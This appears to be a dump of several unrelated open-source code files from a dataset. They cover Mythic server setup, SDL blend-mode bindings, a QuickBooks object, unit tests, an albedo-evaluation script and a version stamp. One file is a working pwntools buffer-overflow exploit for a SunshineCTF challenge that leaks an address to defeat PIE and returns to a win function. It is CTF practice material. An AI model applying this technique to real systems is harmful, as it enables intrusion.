async def handler_405(request, exception):
    """Return a JSON 405 asking the client to refresh its session."""
    body = {"status": "error", "error": "Session Expired, refresh"}
    return json(body, status=405)
@mythic.exception(RequestTimeout)
def request_timeout(request, exception):
    """Report a request timeout (no explicit HTTP status is set)."""
    body = {"status": "error", "error": "request timeout"}
    return json(body)
@mythic.exception(exceptions.AuthenticationFailed)
async def handler_auth_failed(request, exception):
    """API callers get a JSON 401; browser requests get bounced to /login."""
    # NOTE(review): this function name is re-used by the Unauthorized handler
    # defined below; Sanic registers both, but the later definition shadows
    # this one at module level.
    api_markers = ("/new", "webhook", "/auth", "/refresh")
    if any(marker in request.path for marker in api_markers):
        return json({"status": "error", "error": "Authentication failed", "message": "access-denied", "code": "access-denied"}, status=401)
    return response.redirect("/login")
@mythic.exception(Unauthorized)
async def handler_auth_failed(request, exception):
    """API callers get a JSON 403; browser requests get bounced to /login."""
    # NOTE(review): this definition shadows the AuthenticationFailed handler
    # of the same name above; Sanic still registers both.
    api_markers = ("/new", "webhook", "/auth", "/refresh")
    if any(marker in request.path for marker in api_markers):
        return json({"status": "error", "error": "Authentication failed", "message": "Unauthorized", "code": "forbidden"}, status=403)
    return response.redirect("/login")
@mythic.exception(SanicException)
def catch_all(request, exception):
    """Last-resort handler: log the exception and return a generic 500."""
    logger.exception(
        "Caught random exception within Mythic: %s, %s" % (exception, request)
    )
    return json({"status": "error", "error": "Mythic encountered an error"}, status=500)
@mythic.middleware("request")
async def check_ips(request):
    """Enforce the ALLOWED_IPS allowlist on auth-sensitive endpoints."""
    sensitive = (
        request.path in ["/login", "/auth", "/"]
        or "/payloads/download/" in request.path
    )
    if not sensitive:
        return
    client = ip_address(request.headers.get("x-real-ip", request.ip))
    for block in mythic.config["ALLOWED_IPS"]:
        if client in block:
            return
    return json({"error": "Not Found"}, status=404)
@mythic.middleware("response")
async def add_cors(request, response):
    """Allow browsers to send auth and content-type headers cross-origin."""
    allowed = "authorization,content-type"
    response.headers["Access-Control-Allow-Headers"] = allowed
@mythic.listener("before_server_start")
async def setup_initial_info(sanic, loop):
    """Attach the database to the server's event loop, run one-time setup,
    and start the rabbitmq listener. Runs once before Sanic begins serving."""
    logger.info("setup_initial_info")
    app.db_objects = Manager(mythic_db, loop=loop)
    await mythic_db.connect_async(loop=loop)
    app.db_objects.database.allow_sync = True  # logging.WARNING
    await initial_setup()
    asyncio.create_task(app.api.rabbitmq_api.start_listening())
async def initial_setup():
    """
    One-time bootstrap: create connection pools, flush the redis cache, and,
    on a fresh database, create the default admin operator, default
    operation, ATT&CK technique entries, and base artifacts.

    Safe to call on every startup - it aborts early when any operator
    already exists.
    """
    # create mythic_admin
    import multiprocessing

    try:
        max_worker_connection = int(200 / (multiprocessing.cpu_count() + 1))
        app.websocket_pool = await asyncpg.create_pool(
            mythic.config["DB_POOL_ASYNCPG_CONNECT_STRING"],
            max_size=max_worker_connection)
        # redis automatically creates a pool behind the scenes
        app.redis_pool = redis.Redis(host=app.redis_host, port=app.redis_port, db=3)
        # clear the redis database on start so no stale entries survive
        for k in app.redis_pool.keys("*"):
            app.redis_pool.delete(k)
        operators = await app.db_objects.count(Operator.select())
        if operators > 0:
            logger.info("Users already exist, aborting initial install")
            return
        # Create the default admin account with a fresh random salt.
        # BUG FIX: this previously contained an unresolvable placeholder where
        # the configured admin password should be concatenated with the salt.
        salt = str(uuid4())
        password = await crypto.hash_SHA512(salt + mythic_admin_password)
        try:
            admin, created = await app.db_objects.get_or_create(
                Operator, username=mythic_admin_user, password=password, admin=True, active=True, salt=salt
            )
        except Exception as e:
            print(e)
            return
        logger.info("Created Admin")
        # create default operation
        operation, created = await app.db_objects.get_or_create(
            Operation,
            name=default_operation_name,
            admin=admin,
            complete=False,
        )
        logger.info("Created Operation")
        await app.db_objects.get_or_create(
            OperatorOperation, operator=admin, operation=operation
        )
        admin.current_operation = operation
        await app.db_objects.update(admin)
        logger.info("Registered Admin with the default operation")
        logger.info("Started parsing ATT&CK data...")
        # Bulk-load the MITRE ATT&CK techniques shipped with Mythic;
        # `with` ensures the handles close even if a row insert fails.
        with open("./app/default_files/other_info/attack.json", "r") as file:
            attack = js.load(file)  # this is a lot of data and might take a hot second to load
        for obj in attack["techniques"]:
            await app.db_objects.create(ATTACK, **obj)
        logger.info("Created all ATT&CK entries")
        with open("./app/default_files/other_info/artifacts.json", "r") as file:
            artifacts_file = js.load(file)
        for artifact in artifacts_file["artifacts"]:
            await app.db_objects.get_or_create(
                Artifact, name=artifact["name"], description=artifact["description"]
            )
        logger.info("Created all base artifacts")
        logger.info("Successfully finished initial setup")
    except Exception as e:
        from app.api.operation_api import send_all_operations_message
        asyncio.create_task(
            send_all_operations_message(
                message=f"Worker failed to initialize:\n {str(e)}",
                level="warning"))
# /static serves out static images and files
mythic.static("/static", "./app/static", name="shared_files")
mythic.static("/favicon.ico", "./app/static/favicon.ico", name="favicon")
mythic.static("/strict_time.png", "./app/static/strict_time.png", name="strict_time")
mythic.static(
    "/grouped_output.png", "./app/static/grouped_output.png", name="grouped_output"
)
mythic.static(
    "/no_cmd_output.png", "./app/static/no_cmd_output.png", name="no_cmd_output"
)
mythic.static("/add_comment.png", "./app/static/add_comment.png", name="add_comment")

# add links to the routes in this file at the bottom
# (these are passed into the templates via the render calls above)
links["index"] = mythic.url_for("index")
links["login"] = links["WEB_BASE"] + "/login"
links["logout"] = mythic.url_for("logout")
links["settings"] = mythic.url_for("settings")
|
sdl2/blendmode.py | namelivia/py-sdl2 | 222 | 10923 | <gh_stars>100-1000
from ctypes import c_int
from .dll import _bind
__all__ = [
    # Enums
    "SDL_BlendMode",
    "SDL_BLENDMODE_NONE", "SDL_BLENDMODE_BLEND", "SDL_BLENDMODE_ADD",
    "SDL_BLENDMODE_MOD", "SDL_BLENDMODE_MUL", "SDL_BLENDMODE_INVALID",

    "SDL_BlendOperation",
    "SDL_BLENDOPERATION_ADD", "SDL_BLENDOPERATION_SUBTRACT",
    "SDL_BLENDOPERATION_REV_SUBTRACT", "SDL_BLENDOPERATION_MINIMUM",
    "SDL_BLENDOPERATION_MAXIMUM",

    "SDL_BlendFactor",
    "SDL_BLENDFACTOR_ZERO", "SDL_BLENDFACTOR_ONE",
    "SDL_BLENDFACTOR_SRC_COLOR", "SDL_BLENDFACTOR_ONE_MINUS_SRC_COLOR",
    "SDL_BLENDFACTOR_SRC_ALPHA", "SDL_BLENDFACTOR_ONE_MINUS_SRC_ALPHA",
    "SDL_BLENDFACTOR_DST_COLOR", "SDL_BLENDFACTOR_ONE_MINUS_DST_COLOR",
    "SDL_BLENDFACTOR_DST_ALPHA", "SDL_BLENDFACTOR_ONE_MINUS_DST_ALPHA",

    # Functions
    "SDL_ComposeCustomBlendMode"
]

# C enums are exposed as plain c_int values.
# Preset blend modes (bit-flag values; INVALID is a sentinel, not a flag).
SDL_BlendMode = c_int
SDL_BLENDMODE_NONE = 0x00000000
SDL_BLENDMODE_BLEND = 0x00000001
SDL_BLENDMODE_ADD = 0x00000002
SDL_BLENDMODE_MOD = 0x00000004
SDL_BLENDMODE_MUL = 0x00000008
SDL_BLENDMODE_INVALID = 0x7FFFFFFF

# Operations that can be applied when composing a custom blend mode.
SDL_BlendOperation = c_int
SDL_BLENDOPERATION_ADD = 0x1
SDL_BLENDOPERATION_SUBTRACT = 0x2
SDL_BLENDOPERATION_REV_SUBTRACT = 0x3
SDL_BLENDOPERATION_MINIMUM = 0x4
SDL_BLENDOPERATION_MAXIMUM = 0x5

# Source/destination factors for custom blend modes.
SDL_BlendFactor = c_int
SDL_BLENDFACTOR_ZERO = 0x1
SDL_BLENDFACTOR_ONE = 0x2
SDL_BLENDFACTOR_SRC_COLOR = 0x3
SDL_BLENDFACTOR_ONE_MINUS_SRC_COLOR = 0x4
SDL_BLENDFACTOR_SRC_ALPHA = 0x5
SDL_BLENDFACTOR_ONE_MINUS_SRC_ALPHA = 0x6
SDL_BLENDFACTOR_DST_COLOR = 0x7
SDL_BLENDFACTOR_ONE_MINUS_DST_COLOR = 0x8
SDL_BLENDFACTOR_DST_ALPHA = 0x9
SDL_BLENDFACTOR_ONE_MINUS_DST_ALPHA = 0xA

# Builds a custom SDL_BlendMode from factor/operation pairs; per the
# added= guard, only available when running against SDL >= 2.0.6.
SDL_ComposeCustomBlendMode = _bind("SDL_ComposeCustomBlendMode", [SDL_BlendFactor, SDL_BlendFactor, SDL_BlendOperation, SDL_BlendFactor, SDL_BlendFactor, SDL_BlendOperation], SDL_BlendMode, added='2.0.6')
|
quickbooks/objects/companycurrency.py | varunbheemaiah/python-quickbooks | 234 | 11003 | <gh_stars>100-1000
from six import python_2_unicode_compatible
from .base import QuickbooksManagedObject, QuickbooksTransactionEntity, Ref, CustomField, MetaData
@python_2_unicode_compatible
class CompanyCurrency(QuickbooksManagedObject, QuickbooksTransactionEntity):
    """
    QBO definition: Applicable only for companies that enable multicurrency,
    a companycurrency object defines a currency that is active in the
    QuickBooks Online company. The set of active companycurrency objects
    corresponds to the list displayed by the Currency Center in the
    QuickBooks Online UI.
    """

    class_dict = {
        "CustomField": CustomField,
        "MetaData": MetaData,
    }

    qbo_object_name = "CompanyCurrency"

    def __init__(self):
        super(CompanyCurrency, self).__init__()
        # Defaults mirror a blank, active currency record.
        self.Id = None
        self.Code = ""
        self.Name = ""
        self.Active = True
        self.CustomField = None
        self.MetaData = None

    def __str__(self):
        return self.Name

    def to_ref(self):
        """Return a Ref object pointing at this company currency."""
        ref = Ref()
        ref.name = self.Name
        ref.type = self.qbo_object_name
        ref.value = self.Id
        return ref
|
atlas/foundations_contrib/src/test/archiving/test_artifact_downloader.py | DeepLearnI/atlas | 296 | 11007 |
from foundations_spec import *
from unittest.mock import call
class TestArtifactDownloader(Spec):
    """Unit tests for ArtifactDownloader.download_files.

    The archiver is a test double; ``os.makedirs`` is patched so no real
    directories are created.  Tests assert on which files are fetched and
    which target directories are created.
    """

    # Archiver double whose fetch_persisted_file calls are asserted below.
    mock_archiver = let_mock()
    # Patched os.makedirs so directory creation is observable, not real.
    make_directory_mock = let_patch_mock('os.makedirs')

    @let
    def source_directory(self):
        return self.faker.uri_path()

    @let
    def download_directory(self):
        return self.faker.uri_path()

    @let
    def artifact_downloader(self):
        from foundations_contrib.archiving.artifact_downloader import ArtifactDownloader
        return ArtifactDownloader(self.mock_archiver)

    @let
    def mock_foundations_files(self):
        # Files that belong to the foundations runtime itself; they must be
        # excluded from artifact downloads (see the exclusion tests below).
        return [
            'foundations/a',
            'foundations/b',
            'foundations_contrib/c',
            'foundations_contrib/d',
            'foundations_events/e',
            'foundations_events/f',
            'foundations_internal/g',
            'foundations_internal/h',
            'jobs/i',
            'jobs/j',
            'model_serving/k',
            'model_serving/l',
            'venv/m',
            'venv/n',
            'docker_image_version.sh',
            'download_gui_images.sh',
            'foundations_gui.sh',
            'foundations_package_manifest.yaml',
            'foundations_requirements.txt',
            'job.tgz',
            'run.env',
            'run.sh',
            'p.bin',
            'q.bin',
            'template/t',
            'template/u',
        ]

    def test_downloads_single_file_to_specified_directory(self):
        """A single listed file is fetched into the download directory."""
        self._mock_file_list(['path/to/my/file'])
        self.artifact_downloader.download_files('', self.download_directory)
        self.mock_archiver.fetch_persisted_file.assert_called_with('path/to/my/file', self.download_directory + '/path/to/my/file')

    def test_downloads_multiple_files_to_specified_directory(self):
        """Every listed file is fetched, preserving its relative path."""
        self._mock_file_list(['different/file', 'other/different/file'])
        self.artifact_downloader.download_files('', self.download_directory)
        first_file_download = call('different/file', self.download_directory + '/different/file')
        second_file_download = call('other/different/file', self.download_directory + '/other/different/file')
        self.mock_archiver.fetch_persisted_file.assert_has_calls([first_file_download, second_file_download])

    def test_ensures_target_directory_exists(self):
        """The parent directory of a downloaded file is created (exist_ok)."""
        self._mock_file_list(['path/to/my/file'])
        self.artifact_downloader.download_files('', self.download_directory)
        self.make_directory_mock.assert_called_with(self.download_directory + '/path/to/my', exist_ok=True)

    # BUG FIX: this test previously reused the name
    # test_downloads_multiple_files_to_specified_directory, silently
    # shadowing the fetch-calls test above so it never ran.
    def test_creates_directories_for_multiple_files(self):
        """A target directory is created for each downloaded file."""
        self._mock_file_list(['different/file', 'other/different/file'])
        self.artifact_downloader.download_files('', self.download_directory)
        first_directory_creation = call(self.download_directory + '/different', exist_ok=True)
        second_directory_creation = call(self.download_directory + '/other/different', exist_ok=True)
        self.make_directory_mock.assert_has_calls([first_directory_creation, second_directory_creation])

    def test_downloads_only_files_with_specified_source_directory(self):
        """Only files under the requested source prefix are fetched."""
        self._mock_file_list(['different/file', 'other/different/file'])
        self.artifact_downloader.download_files('other/', self.download_directory)
        self.mock_archiver.fetch_persisted_file.assert_called_once_with('other/different/file', self.download_directory + '/other/different/file')

    def test_downloads_only_files_with_specified_source_directory_with_different_source_directory(self):
        """Prefix filtering works for a different source directory too."""
        self._mock_file_list(['different/file', 'other/different/file'])
        self.artifact_downloader.download_files('different/', self.download_directory)
        self.mock_archiver.fetch_persisted_file.assert_called_once_with('different/file', self.download_directory + '/different/file')

    def test_download_does_not_include_foundations_files(self):
        """Runtime-internal foundations files are never downloaded."""
        for foundations_file in self.mock_foundations_files:
            self._mock_file_list(['path/to/some/file', foundations_file])
            self.artifact_downloader.download_files('', self.download_directory)
            self.mock_archiver.fetch_persisted_file.assert_called_with('path/to/some/file', self.download_directory + '/path/to/some/file')

    def test_download_includes_config_yamls(self):
        """*.config.yaml files are user artifacts and are downloaded."""
        for foundations_file in self.mock_foundations_files:
            self._mock_file_list(['a.config.yaml', foundations_file])
            self.artifact_downloader.download_files('', self.download_directory)
            self.mock_archiver.fetch_persisted_file.assert_called_with('a.config.yaml', self.download_directory + '/a.config.yaml')

    def _mock_file_list(self, file_list):
        # Stub the archiver's artifact listing to return *file_list*.
        self.mock_archiver.fetch_miscellaneous = ConditionalReturn()
        self.mock_archiver.fetch_miscellaneous.return_when(file_list, 'job_artifact_listing.pkl')
tests/test_git_commit_one_file.py | mubashshirjamal/code | 1,582 | 11009 | <reponame>mubashshirjamal/code
# -*- coding: utf-8 -*-
import os
from vilya.models.project import CodeDoubanProject
from vilya.models import git
from tests.base import TestCase
from tests.utils import mkdtemp
from vilya.libs import gyt
from vilya.libs.permdir import get_repo_root
class TestGit(TestCase):
    """Integration tests for GitRepo.commit_one_file.

    Each test builds a throwaway repository under the permdir repo root,
    seeds it through real ``git add``/``git commit`` calls in a work tree,
    then exercises commit_one_file against master or a temporary branch.
    """

    @property
    def u(self):
        # A fresh test user, used as the commit author.
        return self.addUser()

    def _path(self, name):
        """Path of the bare repository directory for *name*."""
        return os.path.join(get_repo_root(), '%s.git' % name)

    def _path_work_tree(self, name):
        """Path of the work tree paired with the repository *name*."""
        return os.path.join(get_repo_root(), '%s.work_tree' % name)

    def _repo(self, name, bare=True):
        """Create (or reuse) a test repository.

        When ``bare`` is False a work tree directory is created alongside
        so files can be committed through regular git commands.
        """
        git_path = self._path(name)
        if bare:
            work_tree_path = None
        else:
            work_tree_path = self._path_work_tree(name)
            if not os.path.exists(work_tree_path):
                os.mkdir(work_tree_path)
        try:
            CodeDoubanProject.create_git_repo(git_path)
        # BUG FIX: was a bare ``except:`` which also swallows
        # KeyboardInterrupt/SystemExit; best-effort intent preserved
        # (the repo may already exist from a previous test).
        except Exception:
            pass
        repo = git.GitRepo(git_path, work_tree=work_tree_path)
        return repo

    def _commit(self, repo, filename, content='testcontent',
                message='testmessage'):
        """Write *content* to *filename* and commit it via real git.

        Returns the resulting HEAD sha of the repository.
        """
        # TODO allow commiting more than one file
        assert os.path.exists(repo.work_tree), \
            "repo.work_tree must exist, check if repo has been created with bare=False"  # noqa
        path = os.path.join(repo.work_tree, filename)
        dir_ = os.path.dirname(path)
        if not os.path.exists(dir_):
            os.makedirs(os.path.dirname(path))
        f = open(path, 'w')
        f.write(content)
        f.close()
        rep2 = gyt.repo(repo.path, repo.work_tree, bare=False)
        rep2.call(['add', filename])
        rep2.call(['commit', filename, '-m', message], _env=self.env_for_git)
        return gyt.repo(repo.path).sha()

    def test_simple_commit(self):
        """commit_one_file replaces the content of an existing file."""
        repo = self._repo('test', bare=False)
        self._commit(repo, 'testfile1', 'content1', 'msg1')
        src = repo.get_src('testfile1')
        assert src == ('blob', u'content1')
        repo.commit_one_file('testfile1', 'content1 modified',
                             'change1', self.u, orig_hash=hash('content1'))
        src = repo.get_src('testfile1')
        assert src == ('blob', u'content1 modified')

    def test_simple_commit_do_not_delete_other_files(self):
        """Committing one file leaves sibling files untouched."""
        repo = self._repo('test', bare=False)
        self._commit(repo, 'testfile1', 'content1', 'msg1')
        self._commit(repo, 'testfile2', 'content2', 'msg2')
        repo.commit_one_file('testfile1', 'content1 modified',
                             'change1', self.u, orig_hash=hash('content1'))
        src = repo.get_src('testfile1')
        assert src == ('blob', u'content1 modified')
        type_, files = repo.get_src('')
        assert any(d['path'] == 'testfile2' for d in files), \
            "testfile2 should exists in root tree"
        src = repo.get_src('testfile2')
        assert src == ('blob', u'content2')

    def test_commit_in_inner_directory(self):
        """Files nested in subdirectories can be modified."""
        repo = self._repo('test', bare=False)
        self._commit(repo, 'test/file1', 'content1', 'msg1')
        src = repo.get_src('test/file1')
        assert src == ('blob', u'content1')
        repo.commit_one_file('test/file1', 'content1 modified',
                             'change1', self.u, orig_hash=hash('content1'))
        src = repo.get_src('test/file1')
        assert src == ('blob', u'content1 modified')

    def test_create_file(self):
        """commit_one_file can create a brand new file."""
        repo = self._repo('test', bare=False)
        self._commit(repo, 'file1', 'content1', 'msg1')
        repo.commit_one_file(
            'file2', 'content2 created', 'create1', self.u)
        assert repo.cat('HEAD:file1') == 'content1'
        assert repo.cat('HEAD:file2') == 'content2 created'

    def test_create_first_file(self):
        """commit_one_file works on an empty repository (first commit)."""
        repo = self._repo('test', bare=False)
        repo.commit_one_file(
            'file1', 'content1 created', 'create1', self.u)
        assert repo.cat('HEAD:file1') == 'content1 created'

    def test_create_first_file_and_more(self):
        """Successive single-file commits accumulate files."""
        repo = self._repo('test', bare=False)
        repo.commit_one_file(
            'file1', 'content1 created', 'create1', self.u)
        repo.commit_one_file(
            'file2', 'content2 created', 'create2', self.u)
        repo.commit_one_file(
            'file3', 'content3 created', 'create3', self.u)
        repo.commit_one_file(
            'file4', 'content4 created', 'create4', self.u)
        assert repo.cat('HEAD:file1') == 'content1 created'
        assert repo.cat('HEAD:file2') == 'content2 created'
        assert repo.cat('HEAD:file3') == 'content3 created'
        assert repo.cat('HEAD:file4') == 'content4 created'

    def test_commit_file_on_dirty_index(self):
        """A stale index state must not leak into the next commit."""
        repo = self._repo('test', bare=False)
        repo.commit_one_file(
            'file1', 'content1 created', 'create1', self.u)
        repo.commit_one_file(
            'file2', 'content2 created', 'create2', self.u)
        repo.commit_one_file(
            'file1', 'content1 modified', 'modify1', self.u)
        # Now artificially rewind the index tree state
        repo.call('read-tree HEAD^')
        repo.commit_one_file(
            'file2', 'content2 modified', 'modify2', self.u)
        # the latest commit should not have anything related to file1
        assert 'file1' not in repo.call('log -p -n1')

    def test_create_file_in_dir(self):
        """New files can be created inside existing subdirectories."""
        repo = self._repo('test', bare=False)
        self._commit(repo, 'test/file1', 'content1', 'msg1')
        repo.commit_one_file(
            'test/file2', 'content2 created', 'create1', self.u)
        assert repo.cat('HEAD:test/file1') == 'content1'
        assert repo.cat('HEAD:test/file2') == 'content2 created'

    def test_simple_commit_in_branch(self):
        """Committing to a temp branch leaves master unchanged."""
        repo = self._repo('test', bare=False)
        self._commit(repo, 'testfile1', 'content1', 'msg1')
        tmp_branch = repo.temp_branch_name()
        repo.commit_one_file('testfile1', 'content1 modified', 'change1',
                             self.u, orig_hash=hash('content1'),
                             branch=tmp_branch)
        with mkdtemp() as tmpdir:
            gyt.call(['git', 'clone', repo.path, tmpdir])
            repo_check = gyt.repo(tmpdir, bare=False)
            src = repo_check.call('show HEAD:testfile1')
            assert src == u'content1'
            repo_check.call('checkout master')
            src = repo_check.call('show HEAD:testfile1')
            assert src == u'content1'
            repo_check.call('checkout %s' % tmp_branch)
            src = repo_check.call('show HEAD:testfile1')
            assert src == u'content1 modified'
            repo_check.call('checkout master')
            src = repo_check.call('show HEAD:testfile1')
            assert src == u'content1'

    def test_simple_commit_in_branch_in_subdir(self):
        """Branch commits work for files in subdirectories too."""
        repo = self._repo('test', bare=False)
        self._commit(repo, 'test/file1', 'content1', 'msg1')
        tmp_branch = repo.temp_branch_name()
        repo.commit_one_file('test/file1', 'content1 modified', 'change1',
                             self.u, orig_hash=hash('content1'),
                             branch=tmp_branch)
        with mkdtemp() as tmpdir:
            gyt.call(['git', 'clone', repo.path, tmpdir])
            repo_check = gyt.repo(tmpdir, bare=False)
            src = repo_check.call('show HEAD:test/file1')
            assert src == u'content1'
            repo_check.call('checkout master')
            src = repo_check.call('show HEAD:test/file1')
            assert src == u'content1'
            repo_check.call('checkout %s' % tmp_branch)
            src = repo_check.call('show HEAD:test/file1')
            assert src == u'content1 modified'
            repo_check.call('checkout master')
            src = repo_check.call('show HEAD:test/file1')
            assert src == u'content1'

    def test_simple_commit_in_branch_creates_branch(self):
        """Committing to a nonexistent branch creates it."""
        repo = self._repo('test', bare=False)
        self._commit(repo, 'testfile1', 'content1', 'msg1')
        assert repo.get_branches() == ['master']
        tmp_branch = repo.temp_branch_name()
        repo.commit_one_file('testfile1', 'content1 modified', 'change1',
                             self.u, orig_hash=hash('content1'),
                             branch=tmp_branch)
        assert repo.get_branches() == ['master', tmp_branch]

    def test_simple_commit_in_branch_and_delete_branch(self):
        """Temporary branches can be removed after use."""
        repo = self._repo('test', bare=False)
        self._commit(repo, 'testfile1', 'content1', 'msg1')
        tmp_branch = repo.temp_branch_name()
        repo.commit_one_file('testfile1', 'content1 modified', 'change1',
                             self.u, orig_hash=hash('content1'),
                             branch=tmp_branch)
        assert tmp_branch in repo.get_branches()
        repo.remove_temp_branch(tmp_branch)
        assert tmp_branch not in repo.get_branches()
        assert repo.get_branches() == ['master']

    def test_simple_commit_in_another_branch(self):
        """Commits can target an arbitrary (non-temp) branch name."""
        repo = self._repo('test', bare=False)
        self._commit(repo, 'testfile1', 'content1', 'msg1')
        branch = 'mybranch'
        repo.commit_one_file('testfile1', 'content1 modified', 'change1',
                             self.u, orig_hash=hash('content1'), branch=branch)
        assert branch in repo.get_branches()
        assert set(repo.get_branches()) == set(['master', branch])
|
sunshinectf2020/speedrun/exploit_05.py | nhtri2003gmail/ctf-write-ups | 101 | 11025 | <reponame>nhtri2003gmail/ctf-write-ups<filename>sunshinectf2020/speedrun/exploit_05.py
#!/usr/bin/env python3
# SunshineCTF 2020 speedrun chall_05: leak main's address from the banner,
# rebase the PIE binary, then overflow the 56-byte buffer to return to win().
from pwn import *

binary = context.binary = ELF('./chall_05')

# Pick the target: live service when REMOTE is set, local process otherwise.
if args.REMOTE:
    p = remote('chal.2020.sunshinectf.org', 30005)
else:
    p = process(binary.path)

p.sendlineafter('Race, life\'s greatest.\n', 'foobar')

# The program prints the runtime address of main; use it to defeat PIE.
p.recvuntil('Yes I\'m going to win: ')
main = int(p.recvline().strip(), 16)
binary.address = main - binary.sym.main
log.info('binary.address: ' + hex(binary.address))

# 56 bytes of padding up to the saved return address, then win().
payload = b'A' * 56 + p64(binary.sym.win)
p.sendline(payload)

p.interactive()
|
CompareWHDR.py | Z7Gao/InverseRenderingOfIndoorScene | 171 | 11038 | <filename>CompareWHDR.py
import numpy as np
import sys
import json
import glob
import os.path as osp
import cv2
def compute_whdr(reflectance, judgements, delta=0.1):
    """Compute the Weighted Human Disagreement Rate (WHDR) on IIW judgements.

    Args:
        reflectance: predicted albedo image, H x W (x C) array; sampled at the
            normalized point coordinates stored in the judgements.
        judgements: IIW judgement dict with 'intrinsic_points' and
            'intrinsic_comparisons' entries (as loaded from the dataset JSON).
        delta: relative luminance ratio threshold above which one point is
            considered darker than the other (default 0.1, as in the paper).

    Returns:
        Tuple ``(whdr, whdr_equal, whdr_inequal)`` — overall error plus the
        errors restricted to 'E' (equal) and '1'/'2' (inequal) judgements —
        or ``None`` when no valid comparison contributed any weight.
    """
    points = judgements['intrinsic_points']
    comparisons = judgements['intrinsic_comparisons']
    id_to_points = {p['id']: p for p in points}
    rows, cols = reflectance.shape[0:2]

    error_sum = 0.0
    error_equal_sum = 0.0
    error_inequal_sum = 0.0
    weight_sum = 0.0
    weight_equal_sum = 0.0
    weight_inequal_sum = 0.0

    for c in comparisons:
        # "darker" is "J_i" in our paper
        darker = c['darker']
        if darker not in ('1', '2', 'E'):
            continue

        # "darker_score" is "w_i" in our paper
        weight = c['darker_score']
        # BUG FIX: the None test must come first — evaluating
        # ``weight <= 0.0`` on a None score raises TypeError on Python 3.
        if weight is None or weight <= 0.0:
            continue

        point1 = id_to_points[c['point1']]
        point2 = id_to_points[c['point2']]
        if not point1['opaque'] or not point2['opaque']:
            continue

        # convert to grayscale and threshold; clamp to avoid division by zero
        l1 = max(1e-10, np.mean(reflectance[int(point1['y'] * rows), int(point1['x'] * cols), ...]))
        l2 = max(1e-10, np.mean(reflectance[int(point2['y'] * rows), int(point2['x'] * cols), ...]))

        # convert algorithm value to the same units as human judgements
        if l2 / l1 > 1.0 + delta:
            alg_darker = '1'
        elif l1 / l2 > 1.0 + delta:
            alg_darker = '2'
        else:
            alg_darker = 'E'

        # accumulate weighted disagreement, split by judgement type
        if darker == 'E':
            if darker != alg_darker:
                error_equal_sum += weight
            weight_equal_sum += weight
        else:
            if darker != alg_darker:
                error_inequal_sum += weight
            weight_inequal_sum += weight

        if darker != alg_darker:
            error_sum += weight
        weight_sum += weight

    if weight_sum:
        return (error_sum / weight_sum), error_equal_sum/( weight_equal_sum + 1e-10), error_inequal_sum/(weight_inequal_sum + 1e-10)
    else:
        return None
# --- Evaluation driver: score predicted albedo images against IIW judgements ---
#root = './testReal_cascade0_black_height120_width160/cascade0/iiw/'
root = 'IIW_cascade1/results_brdf2_brdf1/'  # directory of predicted albedo images
rootGt = '/home/zhl/CVPR20/Resubmission/Dataset/IIW/iiw-dataset/data/'  # IIW ground-truth judgement JSONs
suffix = 'albedoBS1.png'  # filename suffix identifying the albedo predictions to score
count = 0.0
whdr_sum = 0.0
whdr_mean = 0.0
img_list = glob.glob(osp.join(root, '*_%s' % suffix ) )
for img_path in img_list:
    #load CGI precomputed file
    # Judgement file is keyed by the IIW image id at the front of the result filename.
    judgement_path = osp.join(rootGt, img_path.split('/')[-1].split('_')[0] + '.json' )
    judgements = json.load(open(judgement_path) )
    count+=1.0
    # Normalize the 8-bit prediction to [0, 1] before scoring.
    ourR = cv2.imread(img_path ).astype(np.float32 ) / 255.0
    whdr, _, _ = compute_whdr(ourR, judgements )
    whdr_sum += whdr
    print('img_path: {0}, whdr: current {1} average {2}'.
            format(img_path.split('/')[-1].split('_')[0], whdr, whdr_sum / count ) )
# Final metric is the unweighted mean WHDR over all scored images.
whdr_mean = whdr_sum / count
print('whdr ours: {0}'.format(whdr_mean ) )
|
theonionbox/stamp.py | ralphwetzel/theonionbox | 120 | 11039 | __title__ = 'The Onion Box'
__description__ = 'Dashboard to monitor Tor node operations.'
__version__ = '20.2'
__stamp__ = '20200119|095654'
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.